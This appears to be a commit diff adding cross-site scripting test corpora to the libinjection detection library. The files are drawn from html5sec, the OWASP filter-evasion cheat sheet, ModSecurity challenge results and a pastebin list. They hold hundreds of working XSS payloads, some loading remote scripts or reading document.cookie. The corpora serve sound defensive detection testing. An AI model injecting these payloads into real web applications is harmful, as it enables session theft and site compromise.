test 101_11 <a href="%0Bjavascript:alert(1)">XXX</a>
|
||||
test 101_12 <a href="%0Cjavascript:alert(1)">XXX</a>
|
||||
test 101_13 <a href="%0Djavascript:alert(1)">XXX</a>
|
||||
test 101_14 <a href="%0Ejavascript:alert(1)">XXX</a>
|
||||
test 101_15 <a href="%0Fjavascript:alert(1)">XXX</a>
|
||||
test 101_16 <a href="%10javascript:alert(1)">XXX</a>
|
||||
test 101_17 <a href="%11javascript:alert(1)">XXX</a>
|
||||
test 101_18 <a href="%12javascript:alert(1)">XXX</a>
|
||||
test 101_19 <a href="%13javascript:alert(1)">XXX</a>
|
||||
test 101_20 <a href="%14javascript:alert(1)">XXX</a>
|
||||
test 101_21 <a href="%15javascript:alert(1)">XXX</a>
|
||||
test 101_22 <a href="%16javascript:alert(1)">XXX</a>
|
||||
test 101_23 <a href="%17javascript:alert(1)">XXX</a>
|
||||
test 101_24 <a href="%18javascript:alert(1)">XXX</a>
|
||||
test 101_25 <a href="%19javascript:alert(1)">XXX</a>
|
||||
test 101_26 <a href="%1Ajavascript:alert(1)">XXX</a>
|
||||
test 101_27 <a href="%1Bjavascript:alert(1)">XXX</a>
|
||||
test 101_28 <a href="%1Cjavascript:alert(1)">XXX</a>
|
||||
test 101_29 <a href="%1Djavascript:alert(1)">XXX</a>
|
||||
test 101_30 <a href="%1Ejavascript:alert(1)">XXX</a>
|
||||
test 101_31 <a href="%1Fjavascript:alert(1)">XXX</a>
|
||||
test 101_32 <a href="%20javascript:alert(1)">XXX</a>
|
||||
|
||||
# B -- other cases are obsolete
|
||||
test 101_33 <a href="j%00avascript:alert(1)">XXX</a>
|
||||
|
||||
# Confirmed in IE8, Does not work in IE9+
|
||||
test 102 <img src="x` `<script>alert(1)</script>"` `>
|
||||
|
||||
test 103 <script>history.pushState(0,0,'/i/am/somewhere_else');</script>
|
||||
|
||||
test 104 <svg xmlns="http://www.w3.org/2000/svg" id="foo"> <x xmlns="http://www.w3.org/2001/xml-events" event="load" observer="foo" handler="data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(1) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar"/> </svg>
|
||||
|
||||
test 105 <iframe src="data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03"></iframe>
|
||||
|
||||
# Safari 4, supported 2005-2010, now obsolete
|
||||
# test 106 <img src onerror /" '"= alt=alert(1)//">
|
||||
|
||||
test 107 <title onpropertychange=alert(1)></title><title title=></title>
|
||||
|
||||
test 108_1 <a href=http://foo.bar/#x=`y></a><img alt="`><img src=xx:x onerror=alert(1)></a>">
|
||||
|
||||
test 108_2 <!a foo=x=`y><img alt="`><img src=xx:x onerror=alert(2)//">
|
||||
|
||||
test 108_3 <?a foo=x=`y><img alt="`><img src=xx:x onerror=alert(3)//">
|
||||
|
||||
# test 109 SVG
|
||||
|
||||
test 110_1 <svg xmlns="http://www.w3.org/2000/svg"> <path d="M0,0" style="marker-start:url(test4.svg#a)"/> </svg>
|
||||
|
||||
test 110_2 <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <marker id="a" markerWidth="1000" markerHeight="1000" refX="0" refY="0"> <a xlink:href="http://google.com"> <set attributeName="xlink:href" to="javascript:alert(1)" begin="1s" /> <rect width="1000" height="1000" fill="white"/> </a> </marker> </svg>
|
||||
|
||||
test 111 <div style="background:url(/f#[a]oo/;color:red/*/foo.jpg);">X</div>
|
||||
|
||||
test 112 <div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X</div>
|
||||
|
||||
test 113 <div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>
|
||||
|
||||
test 114 <x style="background:url('x[a];color:red;/*')">XXX</x>
|
||||
|
||||
test 115_1 <!--[if]><script>alert(1)</script -->
|
||||
test 115_2 <!--[if<img src=x onerror=alert(2)//]> -->
|
||||
|
||||
test 116_1 <import namespace="t" implementation="#default#time2">
|
||||
test 116_2 <?import namespace="t" implementation="#default#time2">
|
||||
|
||||
test 117 <a href="http://attacker.org"> <iframe src="http://example.org/"></iframe> </a>
|
||||
|
||||
test 118 <div draggable="true" ondragstart="event.dataTransfer.setData('text/plain','malicious code');"> <h1>Drop me</h1> </div>
|
||||
|
||||
test 119 <iframe src="view-source:http://www.example.org/" frameborder="0" style="width:400px;height:180px"></iframe>
|
||||
|
||||
test 120 <a href="#" onclick="makePopups()">Spam</a>
|
||||
|
||||
# original for SVG masking
|
||||
# repurposing this as a generic "no SVG"
|
||||
test 121_1 <svg:svg>
|
||||
test 121_2 <svg>
|
||||
test 121_3 <svg:mast id="foo">
|
||||
|
||||
test 122 <iframe sandbox="allow-same-origin allow-forms allow-scripts" src="http://example.org/"></iframe>
|
||||
|
||||
# test 123 "class jacking with jquery" http://html5sec.org/#131, requires scripting
|
||||
|
||||
test 124_1 <script src="/\example.com\foo.js"></script> // Safari 5.0, Chrome 9, 10
|
||||
|
||||
test 124_2 <script src="\\example.com\foo.js"></script> // Safari 5.0
|
||||
|
||||
test 125 <xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
|
||||
|
||||
test 126_1 <object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object>
|
||||
|
||||
test 127_2 <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>
|
||||
|
||||
test 127_1 <svg xmlns="http://www.w3.org/2000/svg" id="x"> <listener event="load" handler="#y" xmlns="http://www.w3.org/2001/xml-events" observer="x"/> <handler id="y">alert(1)</handler> </svg>
|
||||
|
||||
test 127_2 <handler id="y">alert(1)</handler>
|
||||
|
||||
test 127_3 <listener event="load" handler="#y" xmlns="http://www.w3.org/2001/xml-events" observer="x"/>
|
||||
|
||||
test 128 <svg><style><img/src=x onerror=alert(1)// </b>
|
||||
|
||||
test 129_1 <image style='filter:url("data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(1)</script></svg>")'>
|
||||
|
||||
test 129_2 <image filter='filter:url("data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(1)</script></svg>")'>
|
||||
|
||||
test 130_1 <math href="javascript:alert(1)">CLICKME</math>
|
||||
|
||||
test 130_2 <math><maction actiontype="statusline#http://google.com" xlink:href="javascript:alert(2)">CLICKME</maction>
|
||||
|
||||
test 130_3 <math><maction actiontype="statusline" xlink:href="javascript:alert(3)">CLICKME<mtext>http://http://google.com</mtext></maction> </math>
|
||||
|
||||
# Obsolete FF < 10
|
||||
#test 131 TBD Drag and Drop http://html5sec.org/#131
|
||||
|
||||
test 132_1 <set attributeName="xlink:href" begin="accessKey(a)" to="//example.com/?a" />
|
||||
|
||||
test 132_2 <svg height="50px"> <image xmlns:xlink="http://www.w3.org/1999/xlink"> <set attributeName="xlink:href" begin="accessKey(a)" to="//example.com/?a" /> <set attributeName="xlink:href" begin="accessKey(b)" to="//example.com/?b" /> <set attributeName="xlink:href" begin="accessKey(c)" to="//example.com/?c" /> <set attributeName="xlink:href" begin="accessKey(d)" to="//example.com/?d" /> </image>
|
||||
|
||||
test 133 <!-- `<img/src=xx:xx onerror=alert(1)//--!>
|
||||
|
||||
test 134_1 <xmp> <%25 </xmp> <img alt='%25></xmp><img src=xx:x onerror=alert(1)//'>
|
||||
|
||||
test 134_2 <script> x='<%25' </script> %25>/ alert(2) </script>
|
||||
|
||||
test 134_3 XXX <style> *['<!--']{} </style> -->{} *{color:red}</style>
|
||||
|
||||
test 135 <!-- `<img/src=xx:xx onerror=alert(1)//--!>
|
||||
|
||||
# Somewhat odd injection -- ignoring. We can ban dirname is this
|
||||
# is really a problem
|
||||
#test 136 <input name="injected" value="injected" dirname="password" />
|
||||
|
||||
test 137_1 <animate attributeName="xlink:href" begin="0" from="javascript:alert(1)" to="&" />
|
||||
|
||||
test 137_2 <svg> <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="?"> <circle r="400"></circle> <animate attributeName="xlink:href" begin="0" from="javascript:alert(1)" to="&" /> </a>
|
7
libinjection/data/xss-mgentile-2013.txt
Normal file
7
libinjection/data/xss-mgentile-2013.txt
Normal file
|
@ -0,0 +1,7 @@
|
|||
# Mauro Gentile
|
||||
# https://www.owasp.org/images/7/7c/Gentile_OWASP_EU_Tour_2013.pdf
|
||||
<input onfocus=write(1) autofocus>
|
||||
<form id="test" /><button form="test" formaction="javascript:alert(1)">X</button>
|
||||
<video><source onerror="alert(1)">
|
||||
<form><button><button form="test" formaction="javascript:alert(1)">X</button>
|
||||
<script/src=data
|
2
libinjection/data/xss-modsecurity-2013-1.txt
Normal file
2
libinjection/data/xss-modsecurity-2013-1.txt
Normal file
|
@ -0,0 +1,2 @@
|
|||
# http://blog.spiderlabs.com/2013/09/modsecurity-xss-evasion-challenge-results.html
|
||||
<scr%00ipt>confirm(0);</scr%00ipt>
|
3
libinjection/data/xss-modsecurity-2013-2.txt
Normal file
3
libinjection/data/xss-modsecurity-2013-2.txt
Normal file
|
@ -0,0 +1,3 @@
|
|||
# http://blog.spiderlabs.com/2013/09/modsecurity-xss-evasion-challenge-results.html
|
||||
|
||||
%3Cscript%3Edocument.body.innerHTML=%22%3Ca%20onmouseover%0B=location=%27\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x63\x6F\x6E\x66\x69\x72\x6D\x26\x6C\x70\x61\x72\x3B\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x6F\x6F\x6B\x69\x65\x26\x72\x70\x61\x72\x3B%27%3E%3Cinput%20name=attributes%3E%22;%3C/script%3E
|
259
libinjection/data/xss-owasp-cheatsheet-20131120.txt
Normal file
259
libinjection/data/xss-owasp-cheatsheet-20131120.txt
Normal file
|
@ -0,0 +1,259 @@
|
|||
#
|
||||
# https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
|
||||
# based on the RSnake original http://ha.ckers.org/xss.html
|
||||
# Retrieved on 2013-11-20
|
||||
# Much of this wildly obsolete
|
||||
#
|
||||
|
||||
# XSS Locator 2
|
||||
'';!--"<XSS>=&{()}
|
||||
|
||||
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
|
||||
|
||||
<IMG SRC="javascript:alert('XSS');">
|
||||
|
||||
<IMG SRC=JaVaScRiPt:alert('XSS')>
|
||||
|
||||
# Grave Accent Obfuscation
|
||||
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
|
||||
|
||||
# Malformed A Tags
|
||||
# (not actually malformed)
|
||||
<a onmouseover="alert(document.cookie)">xxs link</a>
|
||||
<a onmouseover=alert(document.cookie)>xxs link</a>
|
||||
|
||||
# Malformed IMG Tags
|
||||
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
|
||||
|
||||
# fromCharCode
|
||||
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
|
||||
|
||||
# Default SRC tag to get past filters that check SRC domain
|
||||
<IMG SRC=# onmouseover="alert('xxs')">
|
||||
|
||||
# Default SRC tag by leaving it empty
|
||||
# nickg; Unable to replicate in FF,Safari,Chrome 2014-01-10
|
||||
# <IMG SRC= onmouseover="alert('xxs')">
|
||||
|
||||
# Default SRC tag by leaving it out entirely
|
||||
<IMG onmouseover="alert('xxs')">
|
||||
|
||||
# Decimal HTML character references
|
||||
# obsolete?
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC="/" onerror=javascript:alert('XSS')>
|
||||
|
||||
# Decimal HTML character references without trailing semicolons
|
||||
# obsolete
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC="/x" onerror=javascript:alert('XSS')>
|
||||
|
||||
# Hexadecimal HTML character references without trailing semicolons
|
||||
# obsolete form
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC="/" onerror=javascript:alert('XSS')>
|
||||
|
||||
# Embedded tab
|
||||
# obsolete form
|
||||
#<IMG SRC="jav ascript:alert('XSS');">
|
||||
<IMG SRC="/x" onerror="jav ascript:alert('XSS');">
|
||||
|
||||
# Embedded escaped tab
|
||||
# obsolete form
|
||||
#<IMG SRC="jav	ascript:alert('XSS');">
|
||||
<IMG SRC="/" onerror="jav	ascript:alert('XSS');">
|
||||
|
||||
# Embedded newline to break up XSS
|
||||
# obsolete form
|
||||
#<IMG SRC="jav
ascript:alert('XSS');">
|
||||
<IMG SRC="jav
ascript:alert('XSS');">
|
||||
|
||||
# Embedded CR
|
||||
# obsolete form
|
||||
#<IMG SRC="jav
ascript:alert('XSS');">
|
||||
<IMG SRC="/x" onerror="jav
ascript:alert('XSS');">
|
||||
|
||||
# Null
|
||||
# obsolete form
|
||||
# <IMG SRC="jav%00ascript:alert('XSS');">
|
||||
<IMG SRC="/x" onerror="jav%00ascript:alert('XSS');">
|
||||
|
||||
# Spaces and meta chars before the JavaScript in images for XSS
|
||||
# obsolete form
|
||||
#<IMG SRC="  javascript:alert('XSS');">
|
||||
<IMG SRC="/x" onerror="  javascript:alert('XSS');">
|
||||
|
||||
# Non-alpha-non-digit XS
|
||||
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
|
||||
# this is bogus or obsolete
|
||||
# <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
|
||||
|
||||
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
|
||||
# Extraneous open brackets
|
||||
<<SCRIPT>alert("XSS");//<</SCRIPT>
|
||||
|
||||
# No closing script tags
|
||||
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
|
||||
|
||||
# Protocol resolution in script tags
|
||||
<SCRIPT SRC=//ha.ckers.org/.j>
|
||||
|
||||
# Half open HTML/JavaScript XSS vector
|
||||
<IMG SRC="javascript:alert('XSS')"
|
||||
|
||||
# Double open angle brackets
|
||||
<iframe src=http://ha.ckers.org/scriptlet.html <
|
||||
|
||||
# Escaping JavaScript escapes
|
||||
# N/A
|
||||
|
||||
# End title tag
|
||||
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
|
||||
|
||||
# INPUT image
|
||||
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
|
||||
|
||||
# BODY image
|
||||
<BODY BACKGROUND="javascript:alert('XSS')">
|
||||
|
||||
# IMG Dynsrc
|
||||
# Wildly obsolete
|
||||
<IMG DYNSRC="javascript:alert('XSS')">
|
||||
|
||||
# IMG LOW src
|
||||
# Wildy obsolete
|
||||
<IMG LOWSRC="javascript:alert('XSS')">
|
||||
|
||||
# List-style-image
|
||||
# likely obsolete
|
||||
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
|
||||
|
||||
# VBscript in an image
|
||||
<IMG SRC='vbscript:msgbox("XSS")'>
|
||||
|
||||
# Livescript (older versions of Netscape only)
|
||||
# Obsolete
|
||||
# <IMG SRC="livescript:[code]">
|
||||
|
||||
# BODY tag
|
||||
<BODY ONLOAD=alert('XSS')>
|
||||
|
||||
# BGSOUND
|
||||
<BGSOUND SRC="javascript:alert('XSS');"
|
||||
|
||||
# & JavaScript includes
|
||||
# Obsolete
|
||||
# <BR SIZE="&{alert('XSS')}">
|
||||
|
||||
# STYLE sheet
|
||||
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
|
||||
|
||||
# Remote style sheet
|
||||
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
|
||||
|
||||
# Remote style sheet part 2
|
||||
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
|
||||
|
||||
# Remote style sheet part 3
|
||||
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
|
||||
|
||||
# Remote style sheet part 4
|
||||
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
|
||||
|
||||
# STYLE tags with broken up JavaScript for XSS
|
||||
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
|
||||
|
||||
# STYLE attribute using a comment to break up expression
|
||||
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"
|
||||
|
||||
# IMG STYLE with expression
|
||||
# N/A
|
||||
|
||||
# STYLE tag (Older versions of Netscape only)
|
||||
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
|
||||
|
||||
# STYLE tag using background-image
|
||||
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
|
||||
|
||||
# STYLE tag using background
|
||||
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
|
||||
|
||||
# Anonymous HTML with STYLE attribute
|
||||
<XSS STYLE="xss:expression(alert('XSS'))">
|
||||
|
||||
# Local htc file
|
||||
<XSS STYLE="behavior: url(xss.htc);">
|
||||
|
||||
# META
|
||||
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
|
||||
|
||||
# META using data
|
||||
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
|
||||
|
||||
# META
|
||||
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
|
||||
|
||||
# IFRAME
|
||||
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
|
||||
|
||||
# IFRAME Event based
|
||||
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
|
||||
|
||||
# FRAME
|
||||
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
|
||||
|
||||
# TABLE
|
||||
<TABLE BACKGROUND="javascript:alert('XSS')">
|
||||
|
||||
# TD
|
||||
<TABLE BACKGROUND="javascript:alert('XSS')">
|
||||
|
||||
# DIV background-image
|
||||
<TABLE BACKGROUND="javascript:alert('XSS')">
|
||||
|
||||
# DIV background-image with unicoded XSS exploit
|
||||
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.
|
||||
|
||||
# DIV background-image plus extra characters
|
||||
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
||||
|
||||
# DIV expression
|
||||
<DIV STYLE="width: expression(alert('XSS'));">
|
||||
|
||||
|
||||
# "Downlevel-hidden block"
|
||||
<!--[if gte IE 4]> <SCRIPT>alert('XSS');</SCRIPT> <![endif]-->
|
||||
|
||||
# BASE tag
|
||||
<BASE HREF="javascript:alert('XSS');//">
|
||||
|
||||
# Object tag
|
||||
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
|
||||
|
||||
# Using an EMBED tag you can embed a Flash movie that contains XSS
|
||||
<EMBED SRC="http://ha.ckers.Using an EMBED tag you can embed a Flash movie that contains XSS. Click here for a demo. If you add the attributes allowScriptAccess="never" and allownetworking="internal" it can mitigate this risk (thank you to Jonathan Vanasco for the info).:org/xss.swf" AllowScriptAccess="always"></EMBED>
|
||||
|
||||
# You can EMBED SVG which can contain your XSS vector
|
||||
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
|
||||
|
||||
# Using ActionScript inside flash can obfuscate your XSS vector
|
||||
# N/A
|
||||
|
||||
# XML data island with CDATA obfuscation
|
||||
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
|
||||
|
||||
# Locally hosted XML with embedded JavaScript that is generated using an XML data island
|
||||
<XML SRC="xsstest.xml" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
|
||||
|
||||
# XSS using HTML quote encapsulatio
|
||||
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
|
||||
|
79561
libinjection/data/xss-shazzer.txt
Normal file
79561
libinjection/data/xss-shazzer.txt
Normal file
File diff suppressed because it is too large
Load diff
86
libinjection/data/xss-smoke-test.txt
Normal file
86
libinjection/data/xss-smoke-test.txt
Normal file
|
@ -0,0 +1,86 @@
|
|||
#
|
||||
# Really simple XSS smoke test
|
||||
#
|
||||
|
||||
#
|
||||
# Script Tags
|
||||
#
|
||||
|
||||
# in plain text context - duh
|
||||
<script>alert(1);</script>
|
||||
|
||||
# as attribute <tag $USERINPUT></tag>
|
||||
><script>alert(1);</script>
|
||||
|
||||
# as unquoted value <tag foo=$USERINPUT></tag>
|
||||
x ><script>alert(1);</script>
|
||||
|
||||
# as single quoted value <tag foo='$USERINPUT'></tag>
|
||||
' ><script>alert(1);</script>
|
||||
|
||||
# as double quoted value <tag foo="$USERINPUT"></tag>
|
||||
"><script>alert(1);</script>
|
||||
|
||||
# inside <style>div:color=$USERINPUT;.. </style>
|
||||
red;</style><script>alert(1);</script>
|
||||
|
||||
# inside <style>div { color=$USERINPUT;..} </style>
|
||||
red;}</style><script>alert(1);</script>
|
||||
|
||||
# inside <div style="color:$USERINPUT"...
|
||||
red;"/><script>alert(1);</script>
|
||||
|
||||
# inside CSS URL, e.g. background-image:url('$USERINPUT')
|
||||
');}</style><script>alert(1);</script>
|
||||
|
||||
|
||||
#
|
||||
# onerror (or on-other)
|
||||
#
|
||||
|
||||
# as attribute <tag $USERINPUT></tag>
|
||||
onerror=alert(1)>
|
||||
|
||||
# as unquoted value <tag foo=$USERINPUT></tag>
|
||||
x onerror=alert(1);>
|
||||
|
||||
# as single quoted value <tag foo='$USERINPUT'></tag>
|
||||
x' onerror=alert(1);>
|
||||
|
||||
# as double quoted value <tag foo='$USERINPUT'></tag>
|
||||
x" onerror=alert(1);>
|
||||
|
||||
#
|
||||
# href-like
|
||||
#
|
||||
|
||||
# duh
|
||||
<a href="javascript:alert(1)">
|
||||
|
||||
<a href='javascript:alert(1)'>
|
||||
|
||||
<a href=javascript:alert(1)>
|
||||
|
||||
<a href = javascript:alert(1); >
|
||||
|
||||
<a href=" javascript:alert(1);" >
|
||||
|
||||
<a href="JAVASCRIPT:alert(1);" >
|
||||
|
||||
<a href=" javascript:alert(1)" >
|
||||
|
||||
<a href=" javascript:alert(1)" >
|
||||
|
||||
<a href=" javascript:alert(1)" >
|
||||
|
||||
# does not work
|
||||
#<a href=" javascript:alert(1)" >
|
||||
|
||||
<a href=" javascript:alert(1)" >
|
||||
|
||||
<a href="Javascript:alert(1)" >
|
||||
|
||||
<a href="Javascript:alert(1)" >
|
||||
|
||||
# really a raw embedded null
|
||||
<a href="j�avascript:alert(1)">
|
105
libinjection/data/xss-soaj1664ashar-pastebin-u6FY1xDA.txt
Normal file
105
libinjection/data/xss-soaj1664ashar-pastebin-u6FY1xDA.txt
Normal file
|
@ -0,0 +1,105 @@
|
|||
# http://slid.es/mscasharjaved/cross-site-scripting-my-love
|
||||
# http://pastebin.com/u6FY1xDA
|
||||
# @soaj1664ashar
|
||||
#
|
||||
1) <iframe %00 src="	javascript:prompt(1)	"%00>
|
||||
2) <svg><style>{font-family:'<iframe/onload=confirm(1)>'
|
||||
3) <input/onmouseover="javaSCRIPT:confirm(1)"
|
||||
4) <sVg><scRipt %00>alert(1) {Opera}
|
||||
5) <img/src=`%00` onerror=this.onerror=confirm(1)
|
||||
6) <form><isindex formaction="javascript:confirm(1)"
|
||||
7) <img src=`%00`
 onerror=alert(1)

|
||||
8) <script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script>
|
||||
9) <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
|
||||
10) <iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
|
||||
11) <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
|
||||
12) "><h1/onmouseover='\u0061lert(1)'>%00
|
||||
13) <iframe/src="data:text/html,<svg onload=alert(1)>">
|
||||
14) <meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/>
|
||||
15) <svg><script xlink:href=data:,window.open('https://www.google.com/')></script
|
||||
16) <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
|
||||
17) <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
|
||||
18) <iframe src=javascript:alert(document.location)>
|
||||
19) <form><a href="javascript:\u0061lert(1)">X
|
||||
20) </script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'>
|
||||
21) <img/	  src=`~` onerror=prompt(1)>
|
||||
22) <form><iframe 	  src="javascript:alert(1)" 	;>
|
||||
23) <a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 >X</a
|
||||
24) http://www.google<script .com>alert(document.location)</script
|
||||
25) <a href=[�]"� onmouseover=prompt(1)//">XYZ</a
|
||||
26) <img/src=@  onerror = prompt('1')
|
||||
27) <style/onload=prompt('XSS')
|
||||
28) <script ^__^>alert(String.fromCharCode(49))</script ^__^
|
||||
29) </style  ><script   :-(>/**/alert(document.location)/**/</script   :-(
|
||||
30) �</form><input type="date" onfocus="alert(1)">
|
||||
31) <form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>
|
||||
32) <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
|
||||
33) <iframe srcdoc='<body onload=prompt(1)>'>
|
||||
34) <a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a>
|
||||
35) <script ~~~>alert(0%250)</script ~~~>
|
||||
36) <style/onload=<!--	> alert (1)>
|
||||
37) <///style///><span %2F onmousemove='alert(1)'>SPAN
|
||||
38) <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)
|
||||
39) "><svg><style>{-o-link-source:'<body/onload=confirm(1)>'
|
||||
40) <blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
|
||||
41) <marquee onstart='javascript:alert(1)'>^__^
|
||||
42) <div/style="width:expression(confirm(1))">X</div> {IE7}
|
||||
43) <iframe/%00/ src=javaSCRIPT:alert(1)
|
||||
44) //<form/action=javascript:alert(document.cookie)><input/type='submit'>//
|
||||
45) /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
|
||||
46) //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
|
||||
47) </font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>
|
||||
48) <a/href="javascript: javascript:prompt(1)"><input type="X">
|
||||
49) </plaintext\></|\><plaintext/onmouseover=prompt(1)
|
||||
50) </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera}
|
||||
51) <a href="javascript:\u0061le%72t(1)"><button>
|
||||
52) <div onmouseover='alert(1)'>DIV</div>
|
||||
53) <iframe style="position:absolute;top:0;left:0;width:100%25;height:100%25" onmouseover="prompt(1)">
|
||||
54) <a href="jAvAsCrIpT:alert(1)">X</a>
|
||||
55) <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
|
||||
56) <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
|
||||
57) <var onmouseover="prompt(1)">On Mouse Over</var>
|
||||
58) <a href=javascript:alert(document.cookie)>Click Here</a>
|
||||
59) <img src="/" =_=" title="onerror='prompt(1)'">
|
||||
60) <%25<!--'%25><script>alert(1);</script -->
|
||||
61) <script src="data:text/javascript,alert(1)"></script>
|
||||
62) <iframe/src \/\/onload = prompt(1)
|
||||
63) <iframe/onreadystatechange=alert(1)
|
||||
64) <svg/onload=alert(1)
|
||||
65) <input value=<><iframe/src=javascript:confirm(1)
|
||||
66) <input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
|
||||
67) http://www.<script>alert(1)</script .com
|
